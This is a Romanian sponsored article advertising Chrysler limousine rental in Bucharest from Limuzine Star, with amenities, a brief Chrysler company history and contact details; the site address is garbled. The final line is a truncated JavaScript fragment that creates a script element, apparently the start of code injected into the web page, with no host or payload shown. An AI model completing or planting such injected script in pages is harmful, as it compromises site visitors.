Inchiriere limuzine Bucuresti. Chrysler 300C

Inchiriere limuzine Bucuresti. Chrysler 300CImaginea conteaza intotdeauna! De la lumea show-biz-ului si cea a business-ului pana la omul de rand, imaginea conteaza. Daca pentru primii totul trebuie sa arate impecabil in permanenta, pentru noi, restul muritorilor, portile Raiului se deschid abia cu inchiriere limuzine Bucuresti marca Chrysler.

Te poti bucura de privilegiul de a urca intr-un Chrysler la o nunta, la un botez sau la un eveniment important. Or, daca vrei sa-ti impresionezi iubita, poti inchiria un Chrysler pentru aniversarea voastra, iar cea mai romantica seara se va asterne amintirilor voastre.

De unde se pot inchiria astfel de limuzine de lux in Bucuresti? De la Limuzine Star!

Inchiriere limuzine Bucuresti Chrysler, bijuterii pe 4 roti

 

Cand vorbesti despre limuzina Chrysler, vorbesti despre confort maxim, vorbesti despre eleganta desavarsita, despre spatiu bine gandit, pus la dispozitia calatorilor, despre rezistenta si siguranta in trafic.

Inchiriere limuzine Bucuresti Chrysler reprezinta optiunea ideala, iar aceasta limuzina de lux va face cinste oricarui eveniment din capitala la care te vei prezenta fie el o nunta, un botez, un majorat, petrecerea burlacilor sau a burlacitelor, o zi de nastere, o intalnire de afaceri, seri romantice, transfer la aeroport sau diverse execursii de placere prin oras sau in afara acestuia.

Dotarile unei limuzine Chrysler sunt dintre cele mai moderne, televizoare LCD, iluminare cu LED-uri, fibra optica, DVD cu sistem audio de o sonorizare exceptionala, canapele si frapiere, toate acestea te vor face sa te simti ca-n Rai, si pe buna dreptate.

Iar daca iei in considerare si faptul ca limuzinele Chrysler apartin unui brand american cu o traditie de aproape 100 de ani – compania a fost infiintata in anul 1925 de catre Walter Chrysler – nu poti decat sa te bucuri de aceasta optiune inspirata.

Ca sa facem si putina istorie, Chrysler a cumparat in anul 1928 compania de camioane Fargo si Dodge Brothers Company, incepand vanzarile de autovhehicule si sub aceste branduri. Din anul 1960 Chrysler s-a extins si in Europa unde a cumparat companii franceze, engleze si spaniole. In 1987 Chrysler cumpara AMC-ul sau Motors Corporation, fabricand celebrul Jeep. Iar in 1998 Chrysler a fuzionat cu Daimler-Benz AG, o companie germana de automobile, punand mare accent pe calitate.

Una peste alta, cert este ca o plimbare intr-o limuzina Chrysler prin Bucuresti iti va face enorma placere, avand la dispozitie tot confortul din lume.

Inchiriere limuzine Bucuresti de la Limuzine Star

 

Pentru inchiriere limuzine Bucuresti, marca Chrysler, ia si tu legatura cu Limuzine Star, partenerul potrivit care-ti va inchiria aceste bijuterii pe 4 roti. Nu trebuie decat sa intrii pe Inchiriere-limuzine-Bucuresti.-Chryslerlimuzine-star.ro, site-ul companiei, si sa-ti rezervi limuzina dorita.

O limuzina Chrysler iti este inchiriata sambata si duminica pentru cele mai tari petreceri, minim 5 ore, si distractia poate sa inceapa. Daca sunteti mai multe persoane si inchiriati limuzina pentru mai multe ore, Limuzine Star iti va face si super reduceri.

Cel mai bine este sa dai un telefon si, astfel, sa afli toate detaliile si sa pui la punct o escapada cu adevarat reusita cu o limuzina Chrysler cu care-ti vei impresiona prietenii sau invitatii.

Daca vrei sa ai parte de servicii de calitate, alege inchiriere limuzine Bucuresti de la Limuzine Star. Ai nevoie de informatii suplimentare despre firma si serviciile Limuzine Star? Pentru detalii, suna la numarul 0722-660.040.

Articol oferit de zoom-biz.ro.

var d=document;var s=d.createElement(‘script’);